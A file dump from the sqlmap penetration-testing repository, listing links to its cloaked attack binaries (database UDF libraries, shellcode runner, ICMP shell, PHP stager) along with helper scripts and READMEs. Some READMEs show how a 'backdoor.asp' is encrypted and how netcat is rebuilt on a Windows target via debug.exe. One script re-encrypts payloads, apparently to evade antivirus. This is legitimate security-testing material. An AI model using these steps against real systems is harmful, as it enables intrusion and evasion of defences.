https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/stagers/stager.php_
--------------------------------------------------------------------------------
/data/txt/wordlist.tx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/txt/wordlist.tx_
--------------------------------------------------------------------------------
/data/udf/README.txt:
--------------------------------------------------------------------------------
1 | Binary files in this folder are data files used by sqlmap on the target
2 | system, but not executed on the system running sqlmap. They are licensed
3 | under the terms of the GNU Lesser General Public License and their source
4 | code is available on https://github.com/sqlmapproject/udfhack.
5 |
--------------------------------------------------------------------------------
/data/udf/mysql/linux/32/lib_mysqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/mysql/linux/64/lib_mysqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
--------------------------------------------------------------------------------
/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
--------------------------------------------------------------------------------
/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
--------------------------------------------------------------------------------
/data/xml/banner/oracle.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/data/xml/banner/postgresql.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/data/xml/banner/servlet-engine.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/data/xml/banner/sharepoint.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/data/xml/banner/x-aspnet-version.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/doc/AUTHORS:
--------------------------------------------------------------------------------
1 | Bernardo Damele Assumpcao Guimaraes (@inquisb)
2 |
3 |
4 | Miroslav Stampar (@stamparm)
5 |
6 |
7 | You can contact both developers by writing to dev@sqlmap.org
8 |
--------------------------------------------------------------------------------
/extra/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/extra/beep/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/extra/beep/beep.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/extra/beep/beep.wav
--------------------------------------------------------------------------------
/extra/cloak/README.txt:
--------------------------------------------------------------------------------
1 | To use cloak.py you need to pass it the original file,
2 | and optionally the output file name.
3 |
4 | Example:
5 |
6 | $ python ./cloak.py -i backdoor.asp -o backdoor.asp_
7 |
8 | This will create an encrypted and compressed binary file backdoor.asp_.
9 |
10 | Such file can then be converted to its original form by using the -d
11 | functionality of the cloak.py program:
12 |
13 | $ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
14 |
15 | If you skip the output file name, general rule is that the compressed
16 | file names are suffixed with the character '_', while the original is
17 | get by skipping the last character. So, that means that the upper
18 | examples can also be written in the following form:
19 |
20 | $ python ./cloak.py -i backdoor.asp
21 |
22 | $ python ./cloak.py -d -i backdoor.asp_
23 |
--------------------------------------------------------------------------------
/extra/cloak/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/extra/dbgtool/README.txt:
--------------------------------------------------------------------------------
1 | To use dbgtool.py you need to pass it the MS-DOS executable binary file,
2 | and optionally the output debug.exe script file name.
3 |
4 | Example:
5 |
6 | $ python ./dbgtool.py -i ./nc.exe -o nc.scr
7 |
8 | This will create a ASCII text file with CRLF line terminators called
9 | nc.scr.
10 |
11 | Such file can then be converted to its original portable executable with
12 | the Windows native debug.exe, that is installed by default in all Windows
13 | systems:
14 |
15 | > debug.exe < nc.scr
16 |
17 | To be able to execute it on Windows you have to rename it to end with
18 | '.com' or '.exe':
19 |
20 | > ren nc_exe nc.exe
21 |
--------------------------------------------------------------------------------
/extra/dbgtool/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/extra/icmpsh/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
4 | # Perl by Nico Leidecker )
5 | #
6 | # Copyright (c) 2010, Bernardo Damele A. G.
7 | #
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 |
22 | pass
23 |
--------------------------------------------------------------------------------
/extra/icmpsh/icmpsh.exe_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/extra/icmpsh/icmpsh.exe_
--------------------------------------------------------------------------------
/extra/runcmd/README.txt:
--------------------------------------------------------------------------------
1 | runcmd.exe is an auxiliary program that can be used for running command prompt
2 | commands skipping standard "cmd /c" way. It is licensed under the terms of the
3 | GNU Lesser General Public License.
4 |
--------------------------------------------------------------------------------
/extra/runcmd/runcmd.exe_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/extra/runcmd/runcmd.exe_
--------------------------------------------------------------------------------
/extra/runcmd/src/README.txt:
--------------------------------------------------------------------------------
1 | Compile only the Release version because the Runtime library option
2 | (Project Properties -> Configuration Properties -> C/C++ -> Code
3 | Generation) is set to "Multi-threaded (/MT)", which statically links
4 | everything into executable and doesn't compile Debug version at all.
5 |
--------------------------------------------------------------------------------
/extra/runcmd/src/runcmd.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 9.00
3 | # Visual Studio 2005
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
14 | {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
15 | {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/extra/runcmd/src/runcmd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // runcmd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/extra/runcmd/src/runcmd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later.
9 | #define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows.
10 | #endif
11 |
12 | #include
13 | #include
14 |
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/extra/shellcodeexec/README.txt:
--------------------------------------------------------------------------------
1 | Binary files in this folder are data files used by sqlmap on the target
2 | system, but not executed on the system running sqlmap. They are licensed
3 | under the terms of the GNU Lesser General Public License and their source
4 | code is available on https://github.com/inquisb/shellcodeexec.
5 |
--------------------------------------------------------------------------------
/extra/shellcodeexec/linux/shellcodeexec.x32_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/extra/shellcodeexec/linux/shellcodeexec.x32_
--------------------------------------------------------------------------------
/extra/shellcodeexec/linux/shellcodeexec.x64_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/extra/shellcodeexec/linux/shellcodeexec.x64_
--------------------------------------------------------------------------------
/extra/shellcodeexec/windows/shellcodeexec.x32.exe_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
--------------------------------------------------------------------------------
/extra/shutils/autocompletion.sh:
--------------------------------------------------------------------------------
1 | #/usr/bin/env bash
2 |
3 | # source ./extra/shutils/autocompletion.sh
4 |
5 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
6 | WORDLIST=`python "$DIR/../../sqlmap.py" -hh | grep -Eo '\s\--?\w[^ =,]*' | grep -vF '..' | paste -sd "" -`
7 |
8 | complete -W "$WORDLIST" sqlmap
9 | complete -W "$WORDLIST" ./sqlmap.py
10 |
--------------------------------------------------------------------------------
/extra/shutils/blanks.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # Removes trailing spaces from blank lines inside project files
7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
8 |
--------------------------------------------------------------------------------
/extra/shutils/drei.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # Stress test against Python3
7 |
8 | export SQLMAP_DREI=1
9 | #for i in $(find . -iname "*.py" | grep -v __init__); do python3 -c 'import '`echo $i | cut -d '.' -f 2 | cut -d '/' -f 2- | sed 's/\//./g'`''; done
10 | for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3 -m compileall $i | sed 's/Compiling/Checking/g'; done
11 | unset SQLMAP_DREI
12 | source `dirname "$0"`"/junk.sh"
13 |
14 | # for i in $(find . -iname "*.py" | grep -v __init__); do timeout 10 pylint --py3k $i; done 2>&1 | grep -v -E 'absolute_import|No config file'
15 |
--------------------------------------------------------------------------------
/extra/shutils/duplicates.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # Removes duplicate entries in wordlist like files
7 |
8 | from __future__ import print_function
9 |
10 | import sys
11 |
12 | if __name__ == "__main__":
13 | if len(sys.argv) > 1:
14 | items = list()
15 |
16 | with open(sys.argv[1], 'r') as f:
17 | for item in f:
18 | item = item.strip()
19 | try:
20 | str.encode(item)
21 | if item in items:
22 | if item:
23 | print(item)
24 | else:
25 | items.append(item)
26 | except:
27 | pass
28 |
29 | with open(sys.argv[1], 'w+') as f:
30 | f.writelines("\n".join(items))
31 |
--------------------------------------------------------------------------------
/extra/shutils/junk.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null
7 | find . -name "*.pyc" -exec rm -f {} \; &>/dev/null
8 |
--------------------------------------------------------------------------------
/extra/shutils/newlines.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python
2 |
3 | from __future__ import print_function
4 |
5 | import os
6 | import sys
7 |
8 | def check(filepath):
9 | if filepath.endswith(".py"):
10 | content = open(filepath, "rb").read()
11 | pattern = "\n\n\n".encode("ascii")
12 |
13 | if pattern in content:
14 | index = content.find(pattern)
15 | print(filepath, repr(content[index - 30:index + 30]))
16 |
17 | if __name__ == "__main__":
18 | try:
19 | BASE_DIRECTORY = sys.argv[1]
20 | except IndexError:
21 | print("no directory specified, defaulting to current working directory")
22 | BASE_DIRECTORY = os.getcwd()
23 |
24 | print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY)
25 | for root, dirs, files in os.walk(BASE_DIRECTORY):
26 | if any(_ in root for _ in ("extra", "thirdparty")):
27 | continue
28 | for name in files:
29 | filepath = os.path.join(root, name)
30 | check(filepath)
31 |
--------------------------------------------------------------------------------
/extra/shutils/postcommit-hook.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | : '
4 | cat > .git/hooks/post-commit << EOF
5 | #!/bin/bash
6 |
7 | source ./extra/shutils/postcommit-hook.sh
8 | EOF
9 |
10 | chmod +x .git/hooks/post-commit
11 | '
12 |
13 | SETTINGS="../../lib/core/settings.py"
14 | PYPI="../../extra/shutils/pypi.sh"
15 |
16 | declare -x SCRIPTPATH="${0}"
17 |
18 | FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
19 |
20 | if [ -f $FULLPATH ]
21 | then
22 | LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"')
23 | declare -a LINE
24 | NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
25 | if [ -n "$NEW_TAG" ]
26 | then
27 | #git commit -am "Automatic monthly tagging"
28 | echo "Creating new tag ${NEW_TAG}"
29 | git tag $NEW_TAG
30 | git push origin $NEW_TAG
31 | echo "Going to push PyPI package"
32 | /bin/bash ${SCRIPTPATH%/*}/$PYPI
33 | fi
34 | fi
35 |
--------------------------------------------------------------------------------
/extra/shutils/pycodestyle.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \;
8 |
--------------------------------------------------------------------------------
/extra/shutils/pydiatra.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # Runs py3diatra on all python files (prerequisite: pip install pydiatra)
7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py3diatra '{}' \; | grep -v bare-except
8 |
--------------------------------------------------------------------------------
/extra/shutils/pyflakes.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
4 | # See the file 'LICENSE' for copying permission
5 |
6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes3 '{}' \; | grep -v "redefines '_'"
8 |
--------------------------------------------------------------------------------
/extra/shutils/recloak.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # NOTE: this script is for dev usage after AV something something
4 |
5 | DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P)
6 |
7 | cd $DIR/../..
8 | for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done
9 |
10 | cd $DIR/../cloak
11 | sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py
12 |
13 | cd $DIR/../..
14 | for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done
15 |
16 | git clean -f > /dev/null
17 |
--------------------------------------------------------------------------------
/extra/shutils/strip.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # References: http://www.thegeekstuff.com/2012/09/strip-command-examples/
4 | # http://www.muppetlabs.com/~breadbox/software/elfkickers.html
5 | # https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html
6 |
7 | # https://github.com/BR903/ELFkickers/tree/master/sstrip
8 | # https://www.ubuntuupdates.org/package/core/cosmic/universe/updates/postgresql-server-dev-10
9 |
10 | # For example:
11 | # python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_
12 | # ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so
13 | # python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so
14 | # rm lib_postgresqludf_sys.so
15 |
16 | strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*
17 | sstrip $*
18 |
19 |
--------------------------------------------------------------------------------
/extra/vulnserver/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/controller/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/core/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/lib/core/data.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.datatype import AttribDict
9 | from lib.core.log import LOGGER
10 |
11 | # sqlmap paths
12 | paths = AttribDict()
13 |
14 | # object to store original command line options
15 | cmdLineOptions = AttribDict()
16 |
17 | # object to store merged options (command line, configuration file and default options)
